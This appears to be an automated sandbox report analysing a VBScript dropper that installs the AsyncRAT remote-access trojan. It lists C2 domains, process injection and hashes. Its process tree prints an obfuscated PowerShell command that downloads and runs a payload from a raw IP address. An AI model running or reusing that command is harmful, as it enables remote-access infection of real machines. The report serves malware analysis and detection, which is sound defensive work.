Analysis
-
max time kernel
300s -
max time network
305s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08-07-2024 17:53
Static task
static1
Behavioral task
behavioral1
Sample
fsp.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
fsp.vbs
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
fsp.vbs
Resource
win10v2004-20240704-en
General
-
Target
fsp.vbs
-
Size
10KB
-
MD5
c9f569bd4a2bdec00f03b7e30f47a8dd
-
SHA1
2cdd9694e58e8f3c9c8607f5cc6e31d10b482c32
-
SHA256
7b73596346a36f83b6b540bfc2b779fec228a050e6d7de631d0518b526b9b128
-
SHA512
98d631ad7749c3b7ebd02da6a00796f66951d42f9142fc1bb459904da253f8c90e974a491d4f1e1364f786a8ae8022080a24840260b01f73fd73e8c0fe9a54cd
-
SSDEEP
48:/L2tePUutEk+hDnqhdN6+W0K00ah0ZBjAPa:T2kPUGxwqhdN6l0K00xoi
Malware Config
Extracted
asyncrat
AWS | RxR
Hema
lolroot.duckdns.org:6606
lolroot.duckdns.org:7707
lolroot.duckdns.org:8808
storeroot.duckdns.org:6606
storeroot.duckdns.org:7707
storeroot.duckdns.org:8808
storexroot.duckdns.org:6606
storexroot.duckdns.org:7707
storexroot.duckdns.org:8808
AsyncMutex_9eurjf40i8eurjfiekfj
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral3/memory/3972-46-0x0000000007B10000-0x0000000007BF0000-memory.dmp WebBrowserPassView -
Nirsoft 1 IoCs
resource yara_rule behavioral3/memory/3972-46-0x0000000007B10000-0x0000000007BF0000-memory.dmp Nirsoft -
Blocklisted process makes network request 1 IoCs
flow pid Process 1 640 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 640 powershell.exe 2984 powershell.exe 1664 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2753856825-3907105642-1818461144-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2753856825-3907105642-1818461144-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2753856825-3907105642-1818461144-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2984 set thread context of 3972 2984 powershell.exe 95 PID 1664 set thread context of 4568 1664 powershell.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 640 powershell.exe 640 powershell.exe 2984 powershell.exe 2984 powershell.exe 3972 RegSvcs.exe 1664 powershell.exe 1664 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 3972 RegSvcs.exe Token: SeDebugPrivilege 1664 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3972 RegSvcs.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 3468 wrote to memory of 3296 3468 WScript.exe 82 PID 3468 wrote to memory of 3296 3468 WScript.exe 82 PID 3296 wrote to memory of 640 3296 cmd.exe 84 PID 3296 wrote to memory of 640 3296 cmd.exe 84 PID 1968 wrote to memory of 3328 1968 WScript.exe 92 PID 1968 wrote to memory of 3328 1968 WScript.exe 92 PID 3328 wrote to memory of 2984 3328 cmd.exe 94 PID 3328 wrote to memory of 2984 3328 cmd.exe 94 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 2984 wrote to memory of 3972 2984 powershell.exe 95 PID 3400 wrote to memory of 1736 3400 WScript.exe 98 PID 3400 wrote to memory of 1736 3400 WScript.exe 98 PID 1736 wrote to memory of 1664 1736 cmd.exe 100 PID 1736 wrote to memory of 1664 1736 cmd.exe 100 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 PID 1664 wrote to memory of 4568 1664 powershell.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fsp.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://23.26.108.141:888/zohre.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://23.26.108.141:888/zohre.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\roox.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3972
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\roox.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:4568
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5321756505d3ef828b22186c6b927a5fa
SHA1d65a23744ec9ebb01baa142aa48a50c25e5e3a51
SHA256990c202a39be4cceab0adb117dee8b9179ba607851616d49b653ea0daabc8fcc
SHA51250fccf3a880c26aad38ebef396ab5550be96f0cd5ba602dbb7a017cd78c7fe3f21edb713638929b19f44e919f2879ab251825ad38682fd9a94053b944382bed2
-
Filesize
1KB
MD52eddcac07cd0472f65ddae965dd70145
SHA18dd31710476df43d01d1520f3a8a833bf2ace85a
SHA256b14126f1f8b1e98ae88301fbc9c3a1111d5af90208c18dc0fc935a68efe69e7f
SHA5127f8e4f9338c3937b05ac2e5adef6835bb3f787c1360067db62c35603fb1c33799d5f856f70a7321cb96d48dc5f54f71331b821d8f62afd759386c51ef2c00550
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
195B
MD50344d401c7266a2bc6d19f5a2bc90040
SHA1d3bf5a4b55b523429f3c7cb58ffa19504bececfc
SHA256a3a38fb5090f5b9c951160d60d2fcd0e4488b3e72b1823fc17ef34a15fe9dab7
SHA51259b448d02dadd2934abf88c40e25fec741724112e1320770b06df9b862643f2eba9cedee9d58244145fbece6d0d366380d6d2d6b56082a97649683ca10f9bc07
-
Filesize
704KB
MD5ddf4e48ffb86d26dab3211c61fbfa860
SHA10a4b84e17fd68c86e11b37f1889a159408a12211
SHA256062254d6904583a767b6662a16977c7f90e0c16d08fbc499f2ee18a9a26af5ec
SHA512da62656a3c5468127304dea22c08f622b3b4bd703f3606619fdae3cddf182d80945358bda5ba87d1788cc9db7e48c8edacb36ff9c81e0d30935c85ece888ccd6
-
Filesize
686B
MD5a0a3c05080df4421295e559291304405
SHA1286e02a003b7e26a381e41d2127ffb0ed371f5b4
SHA25622889b8d447ea679e8b2fb27eca95d0f04056203c9214818758b0a21379ea323
SHA512ee9971cda442f9dd305e0810babd0a5f94589a966b2a4f10421b341d6e7914fed3f2a12821dc56d338f7ec5ba9a38830727d0e17fd18257e45ebabd7612e99b4